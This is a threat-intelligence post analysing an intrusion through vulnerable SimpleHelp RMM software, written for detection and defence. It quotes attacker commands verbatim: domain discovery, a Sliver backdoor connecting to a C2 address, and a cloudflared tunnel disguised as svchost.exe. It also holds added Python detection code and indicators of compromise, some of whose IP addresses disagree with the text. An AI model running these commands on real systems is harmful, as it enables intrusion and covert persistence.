
February 6, 2025

Not-so-SimpleHelp exploits enabling deployment of Sliver backdoor

By Ryan Slaney

With contributions from Daniel Albrecht.


Field Effect recently identified and thwarted a sophisticated breach where threat actors exploited newly uncovered vulnerabilities in SimpleHelp’s Remote Monitoring and Management (RMM) client as an entry point to infiltrate and establish unauthorized access within a targeted network.

The attack involved the quick and deliberate execution of several post-compromise tactics, techniques and procedures (TTPs) including network and system discovery, administrator account creation, and the establishment of persistence mechanisms, which could have led to the deployment of ransomware had Field Effect MDR not prevented the attack.

Initial Access

The attack began with the threat actor connecting to the endpoint via the vulnerable SimpleHelp RMM client, called JWrapper-Remote Access, from IP address 194.76.227[.]171. According to a Shodan scan, this IP address is based in Estonia and is running a SimpleHelp Server on port 80.


Image 1: Data associated with IP 194.76.227[.]171 (Source: shodan.io)


Image 2: Screenshot of SimpleHelp instance running on 194.76.227[.]171

According to VirusTotal, only one security vendor considers 194.76.227[.]171 to be malicious, so it’s unlikely that connections from this IP address would arouse suspicion or be blocked by network security devices.


Image 3: Threat score of IP address 194.76.227[.]171 (Source: VirusTotal)

Once successfully connected via RMM, the threat actor quickly executed a series of discovery commands to enumerate system details, user accounts, and network information. Automated Field Effect MDR policies monitoring for the exploitation of SimpleHelp software detected this, issued a high-severity notification to the client, and triggered an immediate analyst investigation and network isolation of the endpoint. 

The following discovery commands were observed:

  • ipconfig /all
  • sc query
  • schtasks
  • driverquery
  • nltest /dclist:
  • nltest /domain_trusts
  • net share
  • net use
  • tasklist
  • findstr CSFalcon
  • quser
  • net group "domain admins" /domain
  • hostname
  • ping <DC_Hostname>
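The discovery sequence above lends itself to a simple behavioural detection: a burst of distinct discovery commands whose parent process is the SimpleHelp client. The following is an added example, not Field Effect's detection logic; the log format, the assumed client install path and the sample lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Discovery commands observed in the incident, expressed as regexes over the command line.
DISCOVERY_PATTERNS = [
    r"^ipconfig\s+/all", r"^sc\s+query", r"^schtasks", r"^driverquery", r"^nltest\s+/dclist",
    r"^nltest\s+/domain_trusts", r"^net\s+share", r"^net\s+use", r"^tasklist", r"^quser",
    r"^findstr\s+CSFalcon", r'^net\s+group\s+"domain admins"', r"^hostname", r"^ping\s+\S+",
]
# Assumption: the SimpleHelp client binary runs from a directory containing this name.
RMM_PARENT_MARKER = "JWrapper-Remote Access"

def match_discovery(cmdline):
    """Index of the first discovery pattern the command line matches, or None."""
    for i, pat in enumerate(DISCOVERY_PATTERNS):
        if re.match(pat, cmdline.strip(), re.IGNORECASE):
            return i
    return None

def detect_rmm_discovery_burst(lines, window_seconds=120, threshold=4):
    """One alert per host where the RMM client spawned >= threshold distinct discovery commands within window_seconds."""
    per_host = defaultdict(list)
    for line in lines:  # constructed format: "<ISO time>|<host>|<parent image>|<command line>"
        ts, host, parent, cmd = line.split("|", 3)
        idx = match_discovery(cmd)
        if idx is not None and RMM_PARENT_MARKER in parent:
            per_host[host].append((datetime.fromisoformat(ts), idx))
    alerts = []
    for host, hits in per_host.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            window = [h for h in hits[i:] if (h[0] - start).total_seconds() <= window_seconds]
            distinct = {idx for _, idx in window}
            if len(distinct) >= threshold:
                alerts.append({"host": host, "count": len(distinct), "first": start.isoformat()})
                break
    return alerts

# Constructed sample telemetry: WS01 reproduces the incident pattern; WS02 and WS03 are benign.
RMM = r"C:\ProgramData\JWrapper-Remote Access\Remote Access.exe"  # assumed install path
SAMPLE_LOG = [
    f"2025-01-30T10:00:01|WS01|{RMM}|ipconfig /all",
    f"2025-01-30T10:00:04|WS01|{RMM}|sc query",
    f"2025-01-30T10:00:09|WS01|{RMM}|nltest /dclist:",
    f'2025-01-30T10:00:15|WS01|{RMM}|net group "domain admins" /domain',
    f"2025-01-30T10:00:22|WS01|{RMM}|findstr CSFalcon",
    r"2025-01-30T11:15:00|WS02|C:\Windows\System32\cmd.exe|ipconfig /all",
    f"2025-01-30T12:00:00|WS03|{RMM}|hostname",
]
```

An administrator running a single ipconfig from cmd.exe, or the RMM client spawning one command, stays below the threshold; the same five commands from the RMM parent within two minutes raise one alert for WS01.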

Backdoor deployment

Once the threat actor understood the environment, they created a new administrator account with the generic name ‘sqladmin’. They then used that account to install a backdoor called agent.exe (EC43ED845102760265ED6343EF1FCEF696588905) as an alternative means of persistent access in case the RMM access was lost.

Initial analysis of the agent.exe binary revealed strings consistent with the Sliver post-exploitation tool written in Go. In addition to networking capabilities, patterns within the set of libraries imported by this binary indicate likely process injection, service tampering, command and process execution, and file system manipulation capabilities. This is consistent with the expected capabilities of the Sliver implant, though the use of these functions within the agent.exe binary has not yet been fully assessed.

Further analysis of the HTTPS C2 communications initiated by the agent.exe binary revealed a client JA3 hash of ‘d6828e30ab66774a91a96ae93be4ae4c’, which has been previously observed in association with Sliver, an open-source adversary simulation and red teaming framework developed by BishopFox, intended for penetration testing but widely abused by threat actors as a backdoor.

Similar to Cobalt Strike and Metasploit, Sliver provides command-and-control (C2) capabilities, allowing attackers to execute commands, move laterally, and maintain persistence on compromised systems. It supports multiple transport methods (DNS, HTTP/TLS, MTLS, WireGuard) and evades traditional security tools due to its modular, Go-based architecture.

The backdoor was configured to connect to the IP address 45.9.148[.]136 on port 443 via the following command:

agent.exe -connect 45.9.148[.]136:443 -ignore-cert

According to Shodan, 45.9.148[.]136 is based in the Netherlands and has services configured on ports 22 (OpenSSH), 443, 7071 (AnyDesk), and 8080. An Nmap scan also revealed a service called ‘realserver’ running on port 7070. It's likely that the Shodan and Nmap scans don’t show the services running on ports 443 and 8080 because the threat actor has configured the server not to provide this information.


Image 4: Data associated with IP 45.9.148[.]136 (Source: shodan.io)

According to VirusTotal, IP 45.9.148[.]136 is currently only recognized as suspicious by 1 out of 94 security vendors, again making it unlikely that connections from this IP address would arouse suspicion or be blocked by network security devices.


Image 5: Threat score of IP address 45.9.149[.]136 (Source: VirusTotal)

Subsequent analysis of agent.exe revealed that it was configured with a secondary command and control (C2) IP address, 45.9.149[.]112. According to Shodan, this IP address is also based in the Netherlands and has Remote Desktop Protocol (RDP) open on port 3389.

Additional analysis using Censys indicates that this IP is also running an AnyDesk server on port 7070, similar to the primary C2 IP address.


Image 6: Data associated with IP 45.9.149[.]112 (Source: censys.io)

According to VirusTotal, IP 45.9.149[.]112 is only recognized as suspicious by 2 out of 94 security vendors.


Image 7: Threat score of IP address 45.9.149[.]112 (Source: VirusTotal)

Lateral movement

The threat actor then focused their attention on the target’s domain controller (DC), the location of which they learned from the discovery commands executed earlier. Once a connection was established again via the vulnerable SimpleHelp RMM client on the DC, the threat actors executed the same discovery commands previously seen and created an administrator account named ‘fpmhlttech’.

However, this time, instead of installing the agent.exe backdoor, the threat actor installed the cloudflared tunnel client, renamed to C:\Windows\svchost.exe so that it would masquerade as the legitimate Windows svchost.exe, via the following command:

c:\Windows\svchost.exe svchost.exe service install (redacted Base64 encoded token)

The threat actor then executed the tunnel via the following command:

c:\Windows\svchost.exe tunnel run --token (redacted Base64 encoded token)

A cloudflared tunnel is a secure, encrypted connection that routes traffic from a local network or device to Cloudflare’s network without exposing public IPs, often used for legitimate remote access, proxying, or bypassing firewall restrictions. The characters following ‘--token’ in the command make up the unique Base64 encoded token assigned to each cloudflared tunnel.

Additional detection and host isolation

Attempted tunnel execution was blocked by the Field Effect MDR endpoint agent, following which the system was also isolated from the network. However, had this activity not been detected and mitigated so quickly, the cloudflared tunnel would have allowed the threat actor to download and install additional payloads, most likely resulting in a ransomware attack.

A postmortem assessment of the attack determined that the victim organization didn’t see an alert we had sent a week prior to the incident. The alert indicated we had detected potentially vulnerable SimpleHelp RMM client software in their environment. Thus, the victim wasn’t aware it had SimpleHelp software in its environment at all, let alone vulnerable software. All instances of SimpleHelp have since been removed.

Attribution

The TTPs observed in this attack, specifically the installation of a cloudflared tunnel, closely resemble those observed in a campaign attributed to the Akira Ransomware group reported by Recon Infosec in May 2023.

However, there isn’t enough overlap for Field Effect to assess with high confidence that Akira was responsible for the attack we observed. The TTPs observed could easily be adopted by other threat actors and are therefore not exclusive to Akira.

Previous attack

On January 28, Field Effect observed and subsequently published a security intelligence post detailing an incident involving a threat actor connecting to a SimpleHelp RMM instance and immediately using this access to disable anti-virus software installed on the host. At the time, we were unable to confirm that this incident was due to the exploitation of a vulnerability.

Field Effect can now confirm that incident was also the result of the exploitation of SimpleHelp RMM vulnerabilities. Analysis of the affected SimpleHelp RMM server configuration file has shown that it had been modified to allow connections from a malicious SimpleHelp server running on Russia-based IP address 213.183.45[.]230.


Image 8: Modified SimpleHelp RMM client configuration file allowing connection to malicious SimpleHelp server on Russian IP 213.183.45[.]230

According to Censys, IP 213.183.45[.]230 hosts a SimpleHelp RMM server on ports 80 and 443, as well as an SSH service on port 22 and an unknown service on port 5939.


Image 9: Services running on Russian IP 213.183.45[.]230 (Source: censys.io)


Image 10: Screenshot of SimpleHelp instance running on 213.183.45[.]230

According to VirusTotal, IP 213.183.45[.]230 is currently not recognized by any security vendor as malicious/suspicious, and could therefore represent infrastructure newly acquired by the threat actor specifically for SimpleHelp exploitation-related campaigns.


Image 11: Threat score of IP address 213.173.45[.]230 (Source: VirusTotal)

Conclusion

This campaign demonstrates just one example of how threat actors are actively exploiting SimpleHelp RMM vulnerabilities to gain unauthorized persistent access to networks of interest. There could be many other types of attacks currently ongoing. Organizations with exposure to these vulnerabilities must update their RMM clients as soon as possible and consider adopting a cybersecurity solution to defend against threats.

In this scenario, Field Effect MDR was able to prevent the attack from escalating to what could have resulted in a ransomware incident. This illustrates the significance of detecting threats early and responding accordingly to limit spread and minimize impact.

Field Effect’s Security Intelligence team continues to track this activity and will provide updates as new intelligence emerges.

Mitigation

To defend against these attacks, organizations using SimpleHelp RMM should take the following steps:

  1. Patch & update: Ensure SimpleHelp and all remote access tools are up to date to mitigate known vulnerabilities.
  2. Restrict remote access: Limit SimpleHelp access to trusted IP ranges and implement multi-factor authentication (MFA).
  3. Monitor for IoCs: Actively monitor network traffic and logs for connections to the listed malicious IPs.
  4. Audit user accounts: Regularly review administrative accounts for unauthorized additions such as ‘sqladmin’ and ‘fpmhlttech’, which were observed in this incident.
  5. Threat hunting: Search for the presence of agent.exe or cloudflared.exe masquerading in unexpected locations.
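A host-side hunting check for the masquerading described in the lateral movement section and in step 5 above, added here as an example and not part of Field Effect's tooling: it flags svchost.exe running outside its system directories, the cloudflared and agent.exe command-line shapes seen in this incident, and the agent.exe hashes listed in the indicators. The process events, paths and tokens are constructed; the hashes are the ones published below.

```python
import ntpath

# Commonly impersonated Windows binaries and the directories they legitimately run from (extend as needed).
SYSTEM_BINARIES = {
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
}
# Command-line shapes from this incident: cloudflared subcommands and the agent.exe connect string.
CMDLINE_SIGNATURES = [
    ("cloudflared service install", ["service", "install"]),
    ("cloudflared tunnel run with token", ["tunnel", "run", "--token"]),
    ("agent.exe connect-back with cert check disabled", ["-connect", "-ignore-cert"]),
]
# agent.exe hashes published in this report (SHA1, SHA256), lower-cased for comparison.
KNOWN_BAD_HASHES = {
    "ec43ed845102760265ed6343ef1fcef696588905",
    "15f3e5b47894b953542d2fe2353786229da47af00c96dc1b41a8efe631364e49",
}

def review_process_event(image_path, command_line, file_hash=None):
    """Return the reasons this process-creation event deserves a look (empty list if none)."""
    reasons = []
    directory, name = ntpath.split(image_path.lower())  # ntpath handles backslashes on any OS
    expected = SYSTEM_BINARIES.get(name)
    if expected and directory not in expected:
        reasons.append(f"{name} running from unexpected directory {directory}")
    tokens = command_line.lower().split()
    for label, needles in CMDLINE_SIGNATURES:
        if all(n in tokens for n in needles):
            reasons.append(f"command line matches {label}")
    if file_hash and file_hash.lower() in KNOWN_BAD_HASHES:
        reasons.append("file hash matches published agent.exe indicator")
    return reasons

def hunt(events):
    """Map event id -> reasons for every event that tripped at least one rule."""
    flagged = {}
    for e in events:
        reasons = review_process_event(e["image"], e["cmdline"], e.get("sha256"))
        if reasons:
            flagged[e["id"]] = reasons
    return flagged

# Constructed process-creation events (not telemetry from the incident); the C2 IP is defanged as in the report.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs -p"},
    {"id": 2, "image": r"C:\Windows\svchost.exe", "cmdline": r"c:\Windows\svchost.exe svchost.exe service install REDACTED_TOKEN"},
    {"id": 3, "image": r"C:\Windows\svchost.exe", "cmdline": r"c:\Windows\svchost.exe tunnel run --token REDACTED_TOKEN"},
    {"id": 4, "image": r"C:\Users\Public\agent.exe", "cmdline": "agent.exe -connect 45.9.148[.]136:443 -ignore-cert", "sha256": "15f3e5b47894b953542d2fe2353786229da47af00c96dc1b41a8efe631364e49"},
    {"id": 5, "image": r"C:\Program Files\Cloudflare\cloudflared.exe", "cmdline": "cloudflared.exe tunnel run --token REDACTED_TOKEN"},
]
```

Event 5 shows the caveat: a legitimately installed cloudflared trips only the command-line rule, so the path mismatch on svchost.exe is the signal that separates the masquerade from sanctioned tunnel use.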

Indicators of compromise

213.173.45[.]230 (Observed hosting malicious SimpleHelp instance)

194.76.227[.]171 (Observed hosting malicious SimpleHelp instance)

45.9.148[.]136 (Primary C2 Server)

45.9.149[.]112 (Secondary C2 Server)

385a826b9f7e72b870a92f1901d9d354 (agent.exe MD5)

EC43ED845102760265ED6343EF1FCEF696588905 (agent.exe SHA1)

15f3e5b47894b953542d2fe2353786229da47af00c96dc1b41a8efe631364e49 (agent.exe SHA256)

d6828e30ab66774a91a96ae93be4ae4c (C2 JA3)

475c9302dc42b2751db9edcac3b74891 (C2 JA3s)

If you have any questions or comments regarding this analysis, please contact us.